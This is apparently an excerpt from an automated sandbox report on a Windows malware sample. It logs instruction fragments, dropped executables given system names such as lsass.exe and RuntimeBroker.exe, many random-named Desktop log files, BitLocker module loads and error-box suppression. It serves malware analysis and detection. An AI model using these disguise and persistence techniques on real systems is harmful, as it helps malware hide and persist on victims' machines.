Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CCEB78 push eax; ret	0_2_00CCEB96
Source: C:\RuntimeDll\cef_process.exe	Code function: 8_2_00007FFAACC96888 push eax; iretd	8_2_00007FFAACC96899
Source: C:\RuntimeDll\cef_process.exe	Code function: 8_2_00007FFAACC967D4 push eax; iretd	8_2_00007FFAACC96899
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFAAC44D2A5 pushad ; iretd	9_2_00007FFAAC44D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFAAC56B8FA push E85933D7h; ret	9_2_00007FFAAC56BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFAAC632316 push 8B485F94h; iretd	9_2_00007FFAAC63231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFAAC46D2A5 pushad ; iretd	10_2_00007FFAAC46D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFAAC58ADE8 push E95F03A2h; ret	10_2_00007FFAAC58AE29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFAAC58BA7A push E85931D7h; ret	10_2_00007FFAAC58BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFAAC652316 push 8B485F92h; iretd	10_2_00007FFAAC65231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFAAC46D2A5 pushad ; iretd	12_2_00007FFAAC46D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFAAC652316 push 8B485F92h; iretd	12_2_00007FFAAC65231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFAAC43D2A5 pushad ; iretd	14_2_00007FFAAC43D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFAAC551030 push E85DF5FBh; ret	14_2_00007FFAAC5510F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFAAC622316 push 8B485F95h; iretd	14_2_00007FFAAC62231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFAAC46D2A5 pushad ; iretd	16_2_00007FFAAC46D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFAAC652316 push 8B485F92h; iretd	16_2_00007FFAAC65231B
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Code function: 24_2_00007FFAACC86888 push eax; iretd	24_2_00007FFAACC86899
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Code function: 24_2_00007FFAACC867D4 push eax; iretd	24_2_00007FFAACC86899

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\RuntimeDll\cef_process.exe

File created: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe

Jump to dropped file

Source: C:\Users\user\Desktop\kBY9lgRaca.exe	File created: C:\RuntimeDll\cef_process.exe	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\zLeRKKNH.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\YztwqAnw.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\ORagGYiO.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\cmPeMAqD.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\rAZKvkEJ.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\lYDDhZsX.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\iqbcNzlc.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\PqvOIQVP.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\YmBoVQXN.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\zlIjJSaG.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\hiNMadse.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\jJYMqGYt.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\pPutoWtQ.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\jBpuMXxn.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\DhKAQyQA.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\HTmgdJna.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\vdXshwoU.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\CNRzgtSC.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\HOdrnIxw.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\eNXvjbiz.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\jWRUMqoc.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\iesEpfvs.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\CtGsekUC.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\owqLTDnh.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\ykSQugis.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\MOnylpdT.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\WkOFzhSS.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\zPzZvHLt.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\uqHSBmkN.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\FelIlyfv.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\wjWAnjWL.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\WtmFjUlP.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\UdNNkMkD.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\KMBPPFZY.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\GWKYIJYf.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\ZVuWGvdL.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\DJEawqoG.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\vZJioLKA.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\tFkkvTtJ.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\CfUiBMYm.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\Yimecftu.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\ZfOmxfIp.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\UicXeyNX.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\QEeosldM.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\hCXTblqe.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\djqniAFy.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	Jump to dropped file

Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\iqbcNzlc.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\zPzZvHLt.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\hCXTblqe.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\PqvOIQVP.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\vZJioLKA.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\UdNNkMkD.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\KMBPPFZY.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\tFkkvTtJ.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\rAZKvkEJ.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\jWRUMqoc.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\Yimecftu.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\QEeosldM.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\GWKYIJYf.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\pPutoWtQ.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\MOnylpdT.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\CfUiBMYm.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\lYDDhZsX.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\ZfOmxfIp.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\HTmgdJna.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\ykSQugis.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\hiNMadse.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\YztwqAnw.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	File created: C:\Users\user\Desktop\ORagGYiO.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\wjWAnjWL.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\WtmFjUlP.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\DhKAQyQA.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\cmPeMAqD.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\zlIjJSaG.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\iesEpfvs.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\FelIlyfv.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\uqHSBmkN.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\djqniAFy.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\CtGsekUC.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\DJEawqoG.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\vdXshwoU.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\UicXeyNX.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\zLeRKKNH.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\jJYMqGYt.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\ZVuWGvdL.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\HOdrnIxw.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\owqLTDnh.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\eNXvjbiz.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\WkOFzhSS.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\CNRzgtSC.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\jBpuMXxn.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File created: C:\Users\user\Desktop\YmBoVQXN.log	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
